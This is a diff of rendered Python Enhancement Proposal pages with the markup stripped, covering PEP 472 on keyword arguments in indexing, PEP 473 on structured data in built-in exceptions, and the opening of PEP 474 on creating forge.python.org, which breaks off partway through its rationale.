The indexing syntax carries a strong semantic content, differentiating it from +a method call: it implies referring to a subset of data. We believe this +semantic association to be important, and wish to expand the strategies allowed +to refer to this data.

+

As a general observation, the number of indices needed by an indexing operation +depends on the dimensionality of the data: one-dimensional data (e.g. a list) +requires one index (e.g. a[3]), two-dimensional data (e.g. a matrix) requires +two indices (e.g. a[2,3]) and so on. Each index is a selector along one of the +axes of the dimensionality, and the position in the index tuple is the +metainformation needed to associate each index to the corresponding axis.

+

The current Python syntax focuses exclusively on position to express the association to the axes, and also contains syntactic sugar to refer to non-punctiform selection (slices):

+
>>> a[3]       # returns the fourth element of a
+>>> a[1:10:2]  # slice notation (extract a non-trivial data subset)
+>>> a[3,2]     # multiple indexes (for multidimensional arrays)
+
+
+

The additional notation proposed in this PEP would allow notations involving +keyword arguments in the indexing operation, e.g.

+
>>> a[K=3, R=2]
+
+
+

which would allow referring to axes by conventional names.

+

One must additionally consider the extended form that allows both positional +and keyword specification

+
>>> a[3,R=3,K=4]
+
+
+

This PEP will explore different strategies to enable the use of these notations.

+
+
+

Use cases

+

The following practical use cases present two broad categories of usage of a keyworded specification: indexing and contextual options. For indexing:

+
    +
  1. To provide a more communicative meaning to the index, preventing e.g. accidental +inversion of indexes
    >>> gridValues[x=3, y=5, z=8]
    +>>> rain[time=0:12, location=location]
    +
    +
    +
  2. +
3. In some domains, such as computational physics and chemistry, the use of a notation such as Basis[Z=5] is a Domain Specific Language notation to represent a level of accuracy
    >>> low_accuracy_energy = computeEnergy(molecule, BasisSet[Z=3])
    +
    +
    +

In this case, the index operation would return a basis set at the chosen level of accuracy (represented by the parameter Z). The reason for using indexing is that the BasisSet object could be internally represented as a numeric table, where rows (the “coefficient” axis, hidden from the user in this example) are associated with individual elements (e.g. rows 0:5 contain coefficients for element 1, rows 5:8 coefficients for element 2) and each column is associated with a given degree of accuracy (“accuracy” or “Z” axis), so that the first column is low accuracy, the second column is medium accuracy and so on. With that indexing, the user would obtain another object representing the contents of the column of the internal table for accuracy level 3.

    +
  4. +
+

Additionally, the keyword specification can be used as an option contextual to +the indexing. Specifically:

+
    +
1. A “default” option allows specifying a default return value when the index is not present
    >>> lst = [1, 2, 3]
    +>>> value = lst[5, default=0]  # value is 0
    +
    +
    +
  2. +
  3. For a sparse dataset, to specify an interpolation strategy +to infer a missing point from e.g. its surrounding data.
    >>> value = array[1, 3, interpolate=spline_interpolator]
    +
    +
    +
  4. +
  5. A unit could be specified with the same mechanism
    >>> value = array[1, 3, unit="degrees"]
    +
    +
    +
  6. +
+

How the notation is interpreted is up to the implementing class.

+
+
+

Current implementation

+

Currently, the indexing operation is handled by the methods __getitem__, __setitem__ and __delitem__. These methods’ signatures accept one argument for the index (with __setitem__ accepting an additional argument for the set value). In the following, we will analyze __getitem__(self, idx) exclusively, with the same considerations implied for the remaining two methods.

+

When an indexing operation is performed, __getitem__(self, idx) is called. +Traditionally, the full content between square brackets is turned into a single +object passed to argument idx:

+
    +
  • When a single element is passed, e.g. a[2], idx will be 2.
  • +
  • When multiple elements are passed, they must be separated by commas: a[2, 3]. +In this case, idx will be a tuple (2, 3). With a[2, 3, "hello", {}] +idx will be (2, 3, "hello", {}).
  • +
  • A slicing notation e.g. a[2:10] will produce a slice object, or a tuple +containing slice objects if multiple values were passed.
  • +
+

Except for its unique ability to handle slice notation, the indexing operation has similarities to a plain method call: it acts like one when invoked with only one element; if the number of elements is greater than one, the idx argument behaves like *args. However, as stated in the Motivation section, an indexing operation has the strong semantic implication of extraction of a subset out of a larger set, which is not automatically associated with a regular method call unless appropriate naming is chosen. Moreover, its different visual style is important for readability.
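The grouping described above is easy to verify with a minimal class whose __getitem__ simply returns its argument:

class Show:
    def __getitem__(self, idx):
        return idx

s = Show()
print(s[2])           # 2
print(s[2, 3])        # (2, 3)
print(s[2:10])        # slice(2, 10, None)
print(s[2:10, "a"])   # (slice(2, 10, None), 'a')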

+
+
+

Specifications

+

The implementation should try to preserve the current signature for __getitem__, or modify it in a backward-compatible way. We will present different alternatives, taking into account the possible cases that need to be addressed:

+
C0. a[1]; a[1,2]         # Traditional indexing
+C1. a[Z=3]
+C2. a[Z=3, R=4]
+C3. a[1, Z=3]
+C4. a[1, Z=3, R=4]
+C5. a[1, 2, Z=3]
+C6. a[1, 2, Z=3, R=4]
+C7. a[1, Z=3, 2, R=4]    # Interposed ordering
+
+
+
+

Strategy “Strict dictionary”

+

This strategy acknowledges that __getitem__ is special in accepting only one object, and the nature of that object must be non-ambiguous in its specification of the axes: it can be either by order, or by name. As a result of this assumption, in the presence of keyword arguments, the passed entity is a dictionary and all labels must be specified.

+
C0. a[1]; a[1,2]      -> idx = 1; idx = (1, 2)
+C1. a[Z=3]            -> idx = {"Z": 3}
+C2. a[Z=3, R=4]       -> idx = {"Z": 3, "R": 4}
+C3. a[1, Z=3]         -> raise SyntaxError
+C4. a[1, Z=3, R=4]    -> raise SyntaxError
+C5. a[1, 2, Z=3]      -> raise SyntaxError
+C6. a[1, 2, Z=3, R=4] -> raise SyntaxError
+C7. a[1, Z=3, 2, R=4] -> raise SyntaxError
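Since the proposed syntax never landed, the dictionary form can today only be spelled out explicitly; a toy container (hypothetical, with made-up Z and R axes) shows the dispatch this strategy implies:

class Grid:
    def __init__(self, data):
        self.data = data  # keyed by (z, r) tuples

    def __getitem__(self, idx):
        if isinstance(idx, dict):
            # What a[Z=3, R=4] would deliver under this strategy:
            # a complete mapping of axis names to indices.
            return self.data[(idx["Z"], idx["R"])]
        # Traditional positional indexing, e.g. a[3, 4].
        return self.data[idx]

g = Grid({(3, 4): "value"})
print(g[3, 4])               # positional axes
print(g[{"Z": 3, "R": 4}])   # named axes, spelled explicitly today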
+
+
+
+

Pros

+
    +
  • Strong conceptual similarity between the tuple case and the dictionary case. +In the first case, we are specifying a tuple, so we are naturally defining +a plain set of values separated by commas. In the second, we are specifying a +dictionary, so we are specifying a homogeneous set of key/value pairs, as +in dict(Z=3, R=4);
  • +
  • Simple and easy to parse on the __getitem__ side: if it gets a tuple, +determine the axes using positioning. If it gets a dictionary, use +the keywords.
  • +
  • C interface does not need changes.
  • +
+
+
+

Neutral

+
    +
  • Degeneracy of a[{"Z": 3, "R": 4}] with a[Z=3, R=4] means the notation +is syntactic sugar.
  • +
+
+
+

Cons

+
    +
  • Very strict.
  • +
  • Destroys ordering of the passed arguments. Preserving the +order would be possible with an OrderedDict as drafted by PEP 468.
  • +
  • Does not allow use cases with mixed positional/keyword arguments such as +a[1, 2, default=5].
  • +
+
+
+
+

Strategy “mixed dictionary”

+

This strategy relaxes the above constraint to return a dictionary containing +both numbers and strings as keys.

+
C0. a[1]; a[1,2]      -> idx = 1; idx = (1, 2)
+C1. a[Z=3]            -> idx = {"Z": 3}
+C2. a[Z=3, R=4]       -> idx = {"Z": 3, "R": 4}
+C3. a[1, Z=3]         -> idx = { 0: 1, "Z": 3}
+C4. a[1, Z=3, R=4]    -> idx = { 0: 1, "Z": 3, "R": 4}
+C5. a[1, 2, Z=3]      -> idx = { 0: 1, 1: 2, "Z": 3}
+C6. a[1, 2, Z=3, R=4] -> idx = { 0: 1, 1: 2, "Z": 3, "R": 4}
+C7. a[1, Z=3, 2, R=4] -> idx = { 0: 1, "Z": 3, 2: 2, "R": 4}
+
+
+
+

Pros

+
    +
  • Opens for mixed cases.
  • +
+
+
+

Cons

+
    +
  • Destroys ordering information for string keys. We have no way of saying if +"Z" in C7 was in position 1 or 3.
  • +
  • Implies switching from a tuple to a dict as soon as any index is specified as a keyword argument. May be confusing to parse.
  • +
+
+
+
+

Strategy “named tuple”

+

Return a named tuple for idx instead of a tuple. Keyword arguments would obviously have their stated name as key, and positional arguments would have an underscore followed by their order:

+
C0. a[1]; a[1,2]      -> idx = 1; idx = (_0=1, _1=2)
C1. a[Z=3]            -> idx = (Z=3)
C2. a[Z=3, R=4]       -> idx = (Z=3, R=4)
C3. a[1, Z=3]         -> idx = (_0=1, Z=3)
C4. a[1, Z=3, R=4]    -> idx = (_0=1, Z=3, R=4)
C5. a[1, 2, Z=3]      -> idx = (_0=1, _1=2, Z=3)
C6. a[1, 2, Z=3, R=4] -> (_0=1, _1=2, Z=3, R=4)
C7. a[1, Z=3, 2, R=4] -> (_0=1, Z=3, _1=2, R=4)
                      or (_0=1, Z=3, _2=2, R=4)
                      or raise SyntaxError
+
+
+

The required typename of the namedtuple could be Index or the name of the argument in the function definition; it keeps the ordering and is easy to analyse by using the _fields attribute. It is backward compatible, provided that C0 with more than one entry now passes a namedtuple instead of a plain tuple.

+
+

Pros

+
    +
  • Looks nice. namedtuple transparently replaces tuple and gracefully +degrades to the old behavior.
  • +
  • Does not require a change in the C interface
  • +
+
+
+

Cons

+
    +
  • According to some sources [4] namedtuple is not well developed. To include it as such an important object would probably require rework and improvement;
  • +
  • The namedtuple fields, and thus the type, will have to change according +to the passed arguments. This can be a performance bottleneck, and makes +it impossible to guarantee that two subsequent index accesses get the same +Index class;
  • +
  • the _n “magic” fields are a bit unusual, but IPython already uses them for result history.
  • +
  • Python currently has no builtin namedtuple. The current one is available +in the “collections” module in the standard library.
  • +
  • Unlike a function, the two notations gridValues[x=3, y=5, z=8] and gridValues[3,5,8] would not gracefully match if the order is modified at call time (e.g. we ask for gridValues[y=5, z=8, x=3]). In a function, we can pre-define argument names so that keyword arguments are properly matched. Not so in __getitem__, which leaves the task of interpreting and matching to __getitem__ itself.
  • +
+
+
+
+

Strategy “New argument contents”

+

In the current implementation, when many arguments are passed to __getitem__, +they are grouped in a tuple and this tuple is passed to __getitem__ as the +single argument idx. This strategy keeps the current signature, but expands the +range of variability in type and contents of idx to more complex representations.

+

We identify four possible ways to implement this strategy:

+
    +
  • P1: uses a single dictionary for the keyword arguments.
  • +
  • P2: uses individual single-item dictionaries.
  • +
  • P3: similar to P2, but replaces single-item dictionaries with a (key, value) tuple.
  • +
  • P4: similar to P2, but uses a special and additional new object: keyword()
  • +
+

Some of these possibilities lead to degenerate notations, i.e. indistinguishable +from an already possible representation. Once again, the proposed notation +becomes syntactic sugar for these representations.

+

Under this strategy, the old behavior for C0 is unchanged.

+
C0: a[1]        -> idx = 1                    # integer
+    a[1,2]      -> idx = (1,2)                # tuple
+
+
+

In C1, we can use either a dictionary or a tuple to represent the key/value pair for the specific indexing entry. We need a tuple wrapping a tuple in C1 because otherwise we cannot differentiate a["Z", 3] from a[Z=3].

+
C1: a[Z=3]      -> idx = {"Z": 3}             # P1/P2 dictionary with single key
+                or idx = (("Z", 3),)          # P3 tuple of tuples
+                or idx = keyword("Z", 3)      # P4 keyword object
+
+
+

As you can see, notation P1/P2 implies that a[Z=3] and a[{"Z": 3}] will +call __getitem__ passing the exact same value, and is therefore syntactic +sugar for the latter. Same situation occurs, although with different index, for +P3. Using a keyword object as in P4 would remove this degeneracy.

+

For the C2 case:

+
C2. a[Z=3, R=4] -> idx = {"Z": 3, "R": 4}     # P1 dictionary/ordereddict
+                or idx = ({"Z": 3}, {"R": 4}) # P2 tuple of two single-key dict
+                or idx = (("Z", 3), ("R", 4)) # P3 tuple of tuples
+                or idx = (keyword("Z", 3),
+                          keyword("R", 4) )   # P4 keyword objects
+
+
+

P1 naturally maps to the traditional **kwargs behavior; however, it breaks the convention that two or more entries for the index produce a tuple. P2 preserves this behavior, and additionally preserves the order. Preserving the order would also be possible with an OrderedDict as drafted by PEP 468.

+

The remaining cases are here shown:

+
C3. a[1, Z=3]   -> idx = (1, {"Z": 3})                     # P1/P2
+                or idx = (1, ("Z", 3))                     # P3
+                or idx = (1, keyword("Z", 3))              # P4
+
+C4. a[1, Z=3, R=4] -> idx = (1, {"Z": 3, "R": 4})          # P1
+                   or idx = (1, {"Z": 3}, {"R": 4})        # P2
+                   or idx = (1, ("Z", 3), ("R", 4))        # P3
+                   or idx = (1, keyword("Z", 3),
+                                keyword("R", 4))           # P4
+
+C5. a[1, 2, Z=3]   -> idx = (1, 2, {"Z": 3})               # P1/P2
+                   or idx = (1, 2, ("Z", 3))               # P3
+                   or idx = (1, 2, keyword("Z", 3))        # P4
+
+C6. a[1, 2, Z=3, R=4] -> idx = (1, 2, {"Z":3, "R": 4})     # P1
+                      or idx = (1, 2, {"Z": 3}, {"R": 4})  # P2
+                      or idx = (1, 2, ("Z", 3), ("R", 4))  # P3
+                      or idx = (1, 2, keyword("Z", 3),
+                                      keyword("R", 4))     # P4
+
+C7. a[1, Z=3, 2, R=4] -> idx = (1, 2, {"Z": 3, "R": 4})    # P1. Pack the keyword arguments. Ugly.
+                      or raise SyntaxError                 # P1. Same behavior as in function calls.
+                      or idx = (1, {"Z": 3}, 2, {"R": 4})  # P2
+                      or idx =  (1, ("Z", 3), 2, ("R", 4)) # P3
+                      or idx =  (1, keyword("Z", 3),
+                                 2, keyword("R", 4))       # P4
+
+
+
+

Pros

+
    +
  • Signature is unchanged;
  • +
  • P2/P3 can preserve ordering of keyword arguments as specified at indexing,
  • +
  • P1 needs an OrderedDict, but would destroy interposed ordering if allowed: +all keyword indexes would be dumped into the dictionary;
  • +
  • Stays within traditional types: tuples and dicts (possibly OrderedDict);
  • +
  • Some proposed strategies are similar in behavior to a traditional function call;
  • +
  • The C interface for PyObject_GetItem and family would remain unchanged.
  • +
+
+
+

Cons

+
    +
  • Apparently complex and wasteful;
  • +
  • Degeneracy in notation (e.g. a[Z=3] and a[{"Z":3}] are equivalent and +indistinguishable notations at the __[get|set|del]item__ level). +This behavior may or may not be acceptable.
  • +
  • For P4, an additional object similar in nature to slice() is needed, but only to disambiguate the above degeneracy.
  • +
  • idx type and layout seems to change depending on the whims of the caller;
  • +
  • May be complex to parse what is passed, especially in the case of tuple of tuples;
  • +
  • P2 creates a lot of single-key dictionaries as members of a tuple, which looks ugly. P3 would be lighter and easier to use than the tuple of dicts, and still preserves order (unlike a regular dict), but would result in clumsy extraction of keywords.
  • +
+
+
+
+

Strategy “kwargs argument”

+

__getitem__ accepts an optional **kwargs argument which should be keyword only. idx also becomes optional, to support the case where only keyword arguments are passed. The signature would then be either

+
__getitem__(self, idx)
+__getitem__(self, idx, **kwargs)
+__getitem__(self, **kwargs)
+
+
+

Applied to our cases would produce:

+
C0. a[1,2]            -> idx=(1,2);  kwargs={}
+C1. a[Z=3]            -> idx=None ;  kwargs={"Z":3}
+C2. a[Z=3, R=4]       -> idx=None ;  kwargs={"Z":3, "R":4}
+C3. a[1, Z=3]         -> idx=1    ;  kwargs={"Z":3}
+C4. a[1, Z=3, R=4]    -> idx=1    ;  kwargs={"Z":3, "R":4}
+C5. a[1, 2, Z=3]      -> idx=(1,2);  kwargs={"Z":3}
+C6. a[1, 2, Z=3, R=4] -> idx=(1,2);  kwargs={"Z":3, "R":4}
+C7. a[1, Z=3, 2, R=4] -> raise SyntaxError # in agreement to function behavior
+
+
+

Empty indexing a[] of course remains invalid syntax.
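A sketch of what an implementing class could look like under this strategy (hypothetical: the interpreter never grew support for passing the keywords through, so today the method can only be invoked explicitly):

class Table:
    def __init__(self, data):
        self.data = data

    def __getitem__(self, idx=None, **kwargs):
        default = kwargs.pop("default", None)
        if kwargs:
            raise TypeError("unexpected keywords: %r" % sorted(kwargs))
        try:
            return self.data[idx]
        except KeyError:
            return default

t = Table({"foo": 1})
print(t.__getitem__("foo"))             # 1, same as t["foo"]
print(t.__getitem__("bar", default=0))  # 0; proposed sugar: t["bar", default=0]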

+
+

Pros

+
    +
  • Similar to function call, evolves naturally from it;
  • +
  • Use of keyword indexing with an object whose __getitem__ +doesn’t have a kwargs will fail in an obvious way. +That’s not the case for the other strategies.
  • +
+
+
+

Cons

+
    +
  • It doesn’t preserve order, unless an OrderedDict is used;
  • +
  • Forbids C7, but is it really needed?
  • +
  • Requires a change in the C interface to pass an additional +PyObject for the keyword arguments.
  • +
+
+
+
+
+

C interface

+

As briefly introduced in the previous analysis, the C interface would +potentially have to change to allow the new feature. Specifically, +PyObject_GetItem and related routines would have to accept an additional +PyObject *kw argument for Strategy “kwargs argument”. The remaining +strategies would not require a change in the C function signatures, but the +different nature of the passed object would potentially require adaptation.

+

Strategy “named tuple” would behave correctly without any change: the class returned by the factory method in collections is a subclass of tuple, meaning that PyTuple_* functions can handle the resulting object.

+
+
+

Alternative Solutions

+

In this section, we present alternative solutions that would work around the missing feature and could make the proposed enhancement not worth implementing.

+
+

Use a method

+

One could keep the indexing as is, and use a traditional get() method for those +cases where basic indexing is not enough. This is a good point, but as already +reported in the introduction, methods have a different semantic weight from +indexing, and you can’t use slices directly in methods. Compare e.g. +a[1:3, Z=2] with a.get(slice(1,3), Z=2).

+

The authors however recognize this argument as compelling: the advantage in semantic expressivity of keyword-based indexing may be offset by it being a rarely used feature that does not bring enough benefit and may see limited adoption.

+
+
+

Emulate requested behavior by abusing the slice object

+

This extremely creative method exploits the slice objects’ behavior, provided that one accepts using strings (or instantiating properly named placeholder objects for the keys), and accepts using “:” instead of “=”.

+
>>> a["K":3]
+slice('K', 3, None)
+>>> a["K":3, "R":4]
+(slice('K', 3, None), slice('R', 4, None))
+>>>
+
+
+

While clearly smart, this approach does not allow easy inquiry of the key/value pair, is too clever and esoteric, and does not allow passing a slice as in a[K=1:10:2].
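For concreteness, a class exploiting this trick would unpack the key/value pairs from the slices’ start and stop attributes, roughly like this:

class KV:
    def __getitem__(self, idx):
        items = idx if isinstance(idx, tuple) else (idx,)
        # Each "key":value pair arrives as slice(key, value, None).
        return {s.start: s.stop for s in items}

print(KV()["K":3, "R":4])   # {'K': 3, 'R': 4}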

+

However, Tim Delaney comments

+
+
“I really do think that a[b=c, d=e] should just be syntax sugar for +a['b':c, 'd':e]. It’s simple to explain, and gives the greatest backwards +compatibility. In particular, libraries that already abused slices in this +way will just continue to work with the new syntax.”
+

We think this behavior would produce inconvenient results. The library Pandas uses +strings as labels, allowing notation such as

+
>>> a[:, "A":"F"]
+
+
+

to extract data from column “A” to column “F”. Under the above comment, this notation +would be equally obtained with

+
>>> a[:, A="F"]
+
+
+

which is weird and collides with the intended meaning of keywords in indexing, that is, specifying the axis through conventional names rather than positioning.

+
+
+

Pass a dictionary as an additional index

+
>>> a[1, 2, {"K": 3}]
+
+
+

This notation, although less elegant, can already be used and achieves similar results. It’s evident that the proposed Strategy “New argument contents” can be interpreted as syntactic sugar for this notation.

+
+
+
+

Additional Comments

+

Commenters also expressed the following relevant points:

+
+

Relevance of ordering of keyword arguments

+

As part of the discussion of this PEP, it’s necessary to decide whether the ordering information of the keyword arguments is important, and whether indexes and keys can be ordered in an arbitrary way (e.g. a[1, Z=3, 2, R=4]). PEP 468 tries to address the first point by proposing the use of an ordereddict; however, one would be inclined to accept that keyword arguments in indexing are equivalent to kwargs in function calls, and therefore as of today equally unordered, and with the same restrictions.

+
+
+

Need for homogeneity of behavior

+

Relative to Strategy “New argument contents”, a comment from Ian Cordasco +points out that

+
+
“it would be unreasonable for just one method to behave totally +differently from the standard behaviour in Python. It would be confusing for +only __getitem__ (and ostensibly, __setitem__) to take keyword +arguments but instead of turning them into a dictionary, turn them into +individual single-item dictionaries.” We agree with his point, however it must +be pointed out that __getitem__ is already special in some regards when it +comes to passed arguments.
+

Chris Angelico also states:

+
+
“it seems very odd to start out by saying “here, let’s give indexing the +option to carry keyword args, just like with function calls”, and then come +back and say “oh, but unlike function calls, they’re inherently ordered and +carried very differently”.” Again, we agree on this point. The most +straightforward strategy to keep homogeneity would be Strategy “kwargs +argument”, opening to a **kwargs argument on __getitem__.
+

One of the authors (Stefano Borini) thinks that only the “strict dictionary” strategy is worthy of implementation. It is non-ambiguous, simple, does not force complex parsing, and addresses the problem of referring to axes either by position or by name. The “options” use case is probably best handled with a different approach, and may be irrelevant for this PEP. The alternative “named tuple” is another valid choice.

+
+
+

Having .get() become obsolete for indexing with default fallback

+

Introducing a “default” keyword could make dict.get() obsolete, which would be +replaced by d["key", default=3]. Chris Angelico however states:

+
+
“Currently, you need to write __getitem__ (which raises an exception on +finding a problem) plus something else, e.g. get(), which returns a default +instead. By your proposal, both branches would go inside __getitem__, which +means they could share code; but there still need to be two branches.”
+

Additionally, Chris continues:

+
+
“There’ll be an ad-hoc and fairly arbitrary puddle of names (some will go +default=, others will say that’s way too long and go def=, except that +that’s a keyword so they’ll use dflt= or something…), unless there’s a +strong force pushing people to one consistent name.”.
+

This argument is valid but it’s equally valid for any function call, and is +generally fixed by established convention and documentation.

+
+
+

On degeneracy of notation

+

User Drekin commented: “The case of a[Z=3] and a[{"Z": 3}] is similar to +current a[1, 2] and a[(1, 2)]. Even though one may argue that the parentheses +are actually not part of tuple notation but are just needed because of syntax, +it may look as degeneracy of notation when compared to function call: f(1, 2) +is not the same thing as f((1, 2)).”.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0472.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0473/index.html b/pep-0473/index.html new file mode 100644 index 00000000000..ac27015d9ad --- /dev/null +++ b/pep-0473/index.html @@ -0,0 +1,386 @@ + + + + + + + + PEP 473 – Adding structured data to built-in exceptions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 473 – Adding structured data to built-in exceptions

+
+
Author:
+
Sebastian Kreft <skreft at deezer.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
29-Mar-2014
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Exceptions like AttributeError, IndexError, KeyError, LookupError, NameError, TypeError, and ValueError do not provide all the information required by programmers to debug and better understand what caused them. Furthermore, in some cases the messages even have slightly different formats, which makes it really difficult for tools to automatically provide additional information to diagnose the problem. To tackle the former and to lay the ground for the latter, it is proposed to expand these exceptions so that they hold both the offending and affected entities.

+
+
+

Rationale

+

The main issue this PEP aims to solve is the fact that current error messages are not that expressive and lack some key information needed to resolve the exceptions. Additionally, the information present in the error message is not always in the same format, which makes it very difficult for third-party libraries to provide automated diagnosis of the error.

+

These automated tools could, for example, detect typos or display or log extra +debug information. These could be particularly useful when running tests or in a +long running application.

+

Although it is in theory possible to have such libraries, they need to resort to hacks in order to achieve the goal. One such example is python-improved-exceptions [1], which modifies the byte-code to keep references to the possibly interesting objects and also parses the error messages to extract information like types or names. Unfortunately, such an approach is extremely fragile and not portable.

+

A similar proposal [2] has been implemented for ImportError and in the same fashion this idea has received support [3]. Additionally, almost 10 years ago Guido asked in [11] to have a clean API to access the affected objects in exceptions like KeyError, AttributeError, NameError, and IndexError. Similar issues and proposal ideas have been raised in the last year. Some other issues have been created, but despite receiving support they were eventually abandoned. References to the created issues are listed below:

+ +

To move forward with the development and to centralize the information and +discussion, this PEP aims to be a meta-issue summarizing all the above +discussions and ideas.

+
+
+

Examples

+
+

IndexError

+

The error message does not reference the list’s length nor the index used.

+
a = [1, 2, 3, 4, 5]
+a[5]
+IndexError: list index out of range
+
+
+
+
+

KeyError

+

By convention the key is the first element of the error’s argument, but there’s no other information regarding the affected dictionary (key types, size, etc.)

+
b = {'foo': 1}
+b['fo']
+KeyError: 'fo'
+
+
+
+
+

AttributeError

+

The object’s type and the offending attribute are part of the error message. +However, there are some different formats and the information is not always +available. Furthermore, although the object type is useful in some cases, given +the dynamic nature of Python, it would be much more useful to have a reference +to the object itself. Additionally the reference to the type is not fully +qualified and in some cases the type is just too generic to provide useful +information, for example in case of accessing a module’s attribute.

+
c = object()
+c.foo
+AttributeError: 'object' object has no attribute 'foo'
+
+import string
+string.foo
+AttributeError: 'module' object has no attribute 'foo'
+
+a = string.Formatter()
+a.foo
+AttributeError: 'Formatter' object has no attribute 'foo'
+
+
+
+
+

NameError

+

The error message typically provides the name.

+
foo = 1
+fo
+NameError: global name 'fo' is not defined
+
+
+
+
+

Other Cases

+

Issues are even harder to debug when the target object is the result of +another expression, for example:

+
a[b[c[0]]]
+
+
+

This issue is also related to the fact that opcodes only have line number +information and not the offset. This proposal would help in this case but not as +much as having offsets.

+
+
+
+

Proposal

+

Extend the exceptions AttributeError, IndexError, KeyError, +LookupError, NameError, TypeError, and ValueError with the +following:

+
    +
  • AttributeError: target (w), attribute
  • IndexError: target (w), key (w), index (just an alias to key)
  • KeyError: target (w), key (w)
  • LookupError: target (w), key (w)
  • NameError: name, scope?
  • TypeError: unexpected_type
  • ValueError: unexpected_value (w)
+

Attributes marked with (w) may need to be weak references [12] to prevent memory cycles. However, this may add unnecessary extra complexity, as noted by R. David Murray [13]. This is especially true given that builtin types do not support being weakly referenced.
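The builtin limitation is easy to demonstrate:

import weakref

try:
    weakref.ref({})   # instances of the builtin dict ...
except TypeError as exc:
    print(exc)        # cannot create weak reference to 'dict' object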

+

TODO(skreft): expand this with examples of corner cases.

+

To remain backwards compatible these new attributes will be optional and keyword +only.

+

It is proposed to add this information, rather than just improve the error messages, as the former would enable new debugging frameworks and tools and also allow switching in the future to lazily generated messages. Generated messages are discussed in [2], although they are not implemented at the moment. They would not only save some resources, but also make the messages uniform.
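A rough sketch of the direction (StructuredKeyError and its attributes are hypothetical; the proposal was rejected and the builtin exceptions grew no such fields):

class StructuredKeyError(KeyError):
    def __init__(self, key, *, target=None):   # new attributes are keyword only
        super().__init__(key)
        self.key = key
        self.target = target  # the PEP discusses weak references here

    def __str__(self):
        # The message is generated lazily, only when actually rendered.
        if self.target is not None:
            return "%r (mapping has %d key(s))" % (self.key, len(self.target))
        return repr(self.key)

try:
    raise StructuredKeyError('fo', target={'foo': 1})
except StructuredKeyError as exc:
    print(exc)         # 'fo' (mapping has 1 key(s))
    print(exc.target)  # the affected dictionary, available to tooling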

+

The stdlib will then be gradually changed to start using these new attributes.

+
+
+

Potential Uses

+

An automated tool could for example search for similar keys within the object, allowing it to display the following:

+
a = {'foo': 1}
+a['fo']
+KeyError: 'fo'. Did you mean 'foo'?
+
+foo = 1
+fo
+NameError: global name 'fo' is not defined. Did you mean 'foo'?
+
+
+

See [3] for the output a TestRunner could display.
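Such a suggestion facility can be approximated today with difflib, provided the tool can get at the affected mapping from context (exactly what the proposed target attribute would supply directly):

import difflib

def suggest(key, candidates):
    """Return a '. Did you mean ...?' suffix, or '' if nothing is close."""
    matches = difflib.get_close_matches(str(key), [str(c) for c in candidates], n=1)
    if matches:
        return ". Did you mean %r?" % matches[0]
    return ""

a = {'foo': 1}
try:
    a['fo']
except KeyError as exc:
    print("KeyError: %r%s" % (exc.args[0], suggest(exc.args[0], a)))
    # KeyError: 'fo'. Did you mean 'foo'?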

+
+
+

Performance

+

Filling these new attributes would only require two extra parameters with data already available, so the impact should be marginal. However, it may need special care for KeyError, as the following pattern is already widespread.

+
try:
    a[foo] = a[foo] + 1
except KeyError:
    # The KeyError is constructed and discarded on every miss, so any
    # extra cost in building the exception is paid here repeatedly.
    a[foo] = 0
+
+
+

Note as well that storing these objects into the error itself would allow the +lazy generation of the error message, as discussed in [2].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0473.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0474/index.html b/pep-0474/index.html new file mode 100644 index 00000000000..03e6b3fbd8f --- /dev/null +++ b/pep-0474/index.html @@ -0,0 +1,544 @@ + + + + + + + + PEP 474 – Creating forge.python.org | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 474 – Creating forge.python.org

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Process
+
Created:
+
19-Jul-2014
+
Post-History:
+
19-Jul-2014, 08-Jan-2015, 01-Feb-2015
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes setting up a new PSF provided resource, forge.python.org, +as a location for maintaining various supporting repositories +(such as the repository for Python Enhancement Proposals) in a way that is +more accessible to new contributors, and easier to manage for core +developers.

+

This PEP does not propose any changes to the core development workflow +for CPython itself (see PEP 462 in relation to that).

+
+
+

PEP Withdrawal

+

This PEP has been withdrawn by the author +in favour of the GitLab based proposal in PEP 507.

+

If anyone else would like to take over championing this PEP, contact the core-workflow mailing list.

+
+
+

Proposal

+

This PEP proposes that an instance of the self-hosted Kallithea code +repository management system be deployed as “forge.python.org”.

+

Individual repositories (such as the developer guide or the PEPs repository) +may then be migrated from the existing hg.python.org infrastructure to the +new forge.python.org infrastructure on a case-by-case basis. Each migration +will need to decide whether to retain a read-only mirror on hg.python.org, +or whether to just migrate wholesale to the new location.

+

In addition to supporting read-only mirrors on hg.python.org, +forge.python.org will also aim to support hosting mirrors on popular +proprietary hosting sites like GitHub and BitBucket. The aim will be to +allow users familiar with these sites to submit and discuss pull requests +using their preferred workflow, with forge.python.org automatically bringing +those contributions over to the master repository.

+

Given the availability and popularity of commercially backed “free for open +source projects” repository hosting services, this would not be a general +purpose hosting site for arbitrary Python projects. The initial focus will be +specifically on CPython and other repositories currently hosted on +hg.python.org. In the future, this could potentially be expanded to +consolidating other PSF managed repositories that are currently externally +hosted to gain access to a pull request based workflow, such as the +repository for the python.org Django application. As with the initial +migrations, any such future migrations would be considered on a case-by-case +basis, taking into account the preferences of the primary users of each +repository.

+
+
+

Rationale

+

Currently, hg.python.org hosts more than just the core CPython repository, +it also hosts other repositories such as those for the CPython developer +guide and for Python Enhancement Proposals, along with various “sandbox” +repositories for core developer experimentation.

+

